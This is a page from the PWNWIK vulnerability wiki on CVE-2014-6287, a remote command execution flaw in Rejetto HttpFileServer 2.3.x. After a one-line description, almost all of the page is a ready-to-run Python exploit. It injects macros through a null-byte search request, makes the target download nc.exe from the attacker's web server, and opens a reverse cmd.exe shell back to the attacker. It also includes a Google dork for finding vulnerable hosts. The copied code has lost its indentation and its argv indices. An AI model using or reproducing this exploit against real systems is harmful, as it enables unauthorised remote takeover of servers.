PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
INFO
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
EXP
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more
# compatible with today's Internet. It also differs from classic web servers because
# it's very easy to use and runs "right out-of-the box". Access your remote files, over
# the network. It has been successfully tested with Wine under Linux.
# Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
import urllib2 as url
import sys
if len(sys.argv) == 5:
rhost = sys.argv1
rport = sys.argv2
lhost = sys.argv3 # local IP address
lport = sys.argv4 # Local Port number
else:
print "- Something went wrong..!"
print "- Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv0
print "- Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe"
sys.exit(-1)
vbscript="C:\Users\Public\script.vbs"
ncdownurl="http://"+lhost+"/nc.exe"
ncpathsave="C:\\Users\\Public\\nc.exe"
exe1 = "exec|" + "cscript.exe "+vbscript
exe2 = "exec|" + ncpathsave+" -e cmd.exe " +lhost + " " + lport
save='''save|'''+vbscript+'''|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "'''+ncdownurl+'''", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "'''+ncpathsave+'''", 2 '//overwrite
end with
'''
try:
# create vbs wget nc.exe
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(save) + ".}")
#execute_script
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe1) + ".}")
#nc_run():
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe2) + ".}")
except:
print "- Something went wrong..!"
print "- Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv0
print "- Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe"
sys.exit(-1)
免费、自由、人人可编辑的漏洞库--pwnwiki.com
